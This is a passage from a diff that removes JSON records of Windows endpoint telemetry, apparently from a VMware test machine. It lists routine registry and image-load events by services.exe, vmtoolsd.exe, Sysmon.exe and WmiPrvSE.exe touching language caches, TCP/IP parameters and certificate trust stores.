Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": 